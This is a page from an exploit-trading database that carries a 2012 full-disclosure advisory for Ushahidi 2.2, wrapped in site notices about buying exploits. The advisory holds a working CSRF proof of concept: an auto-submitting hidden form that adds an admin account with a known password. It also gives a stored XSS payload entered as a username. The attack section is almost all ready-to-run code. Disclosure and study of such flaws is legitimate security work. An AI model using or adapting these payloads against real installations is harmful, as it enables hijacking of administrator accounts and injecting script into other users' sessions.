0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ushahidi 2.2 Multiple Vulnerabilites
# Exploit Title: Ushahidi 2.2 Multiple Vulnerabilites # Date: 04/12/2012 # Author: shpendk # Software Link: http://download.ushahidi.com/ # Version: 2.2 # Tested on: Xampp on Windows # Vendor Contact: 03/25/2012 -> Contacted again: 03/28/2012 -> No Response yet: 04/11/2012 -> Full Disclosure: 04/12/2012 1) CSRF Add Admin PoC: ----------------------------------------------------------------------------------------------------- <html> <body> <form action="http://127.0.0.1/admin/users/edit" method="POST"> <input type="hidden" name="name" value="myname"> <input type="hidden" name="email" value="shpendk13@gmail.com"> <input type="hidden" name="role" value="admin"> <input type="hidden" name="username" value="shpendk"> <input type="hidden" name="notify" value="1"> <input type="hidden" name="password" value="letmein"> <input type="hidden" name="password_again" value="letmein"> </form> <script> document.forms[0].submit(); </script> </body> </html> ------------------------------------------------------------------------------------------------------- 2) Persistent XSS ------------------------------------------------------------------------------------------------------ -> Go to http://127.0.0.1/login -> Create New User -> Enter username: <img/onerror="alert(123)"src=a> -> Login as Admin and go to http://127.0.0.1/admin/users ------------------------------------------------------------------------------------------------------ # 0day.today [2024-12-26] #